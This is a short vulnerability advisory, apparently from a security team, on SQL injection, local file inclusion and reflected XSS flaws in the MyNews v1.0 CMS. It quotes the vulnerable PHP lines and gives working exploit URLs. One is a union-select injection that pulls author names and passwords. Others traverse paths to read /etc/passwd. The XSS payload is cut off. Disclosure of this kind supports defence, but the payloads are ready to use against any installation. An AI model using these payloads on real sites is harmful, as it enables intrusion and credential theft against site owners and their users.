MyNews v1.0 CMS - Sql Injection, local file inclusion and XSS Vulnerabilities Found by: mr_me - Advisory: Dork: "Corelan Security Team" Homepage: Download: Greetz: Corelan Security Team Notes: - Provided 'as is', without any warranty. - Use for educational purposes only. - Do not use this to do anything illegal ! - Corelan cannot be held responsible for any damages this may cause. ****************** Sql Injection PoC: ****************** -------[ SNIP ]----------> article.php, line 10 $sql_query = "select id, title, text, views from ".$prefix."_news where id=".$_GET[id].""; -------[ EOF SNIP ]------> http://[server]/MyNews/index.php?act=article&id=[ SQLI ] http://[server]/MyNews/index.php?act=article&id=-12+union+select+1,2,concat(name,0x3a,pwd),4+from+_authors-- ******************** File Inclusion PoCs: ******************** -------[ SNIP ]----------> index.php, line 18 if (!isset($_GET['act'])) { $act = 'news'; } else { $act = $_GET['act']; } include('./includes/header.php'); require('./includes/'.$act.'.php'); -------[ EOF SNIP ]------> -------[ SNIP ]----------> admin.php, line 65 if(!isset($act)){$act ="index"; } if($act){include("includes/admin/$act.php"); $smarty->assign("act", $act); } -------[ EOF SNIP ]------> 1: http://[server]/MyNews/index.php?act=[ LFI ]%00&id=12 http://[server]/MyNews/index.php?act=../../../../etc/passwd%00&id=12 2 (requires authentication): http://[server]/MyNews/admin.php?act=[ LFI ]%00 http://[server]/MyNews/admin.php?act=../../../../etc/passwd%00 ******************* Reflective XSS PoC: ******************* http://[server]/MyNews/admin.php?act= __________________________________________________________________________________________________________________ EOF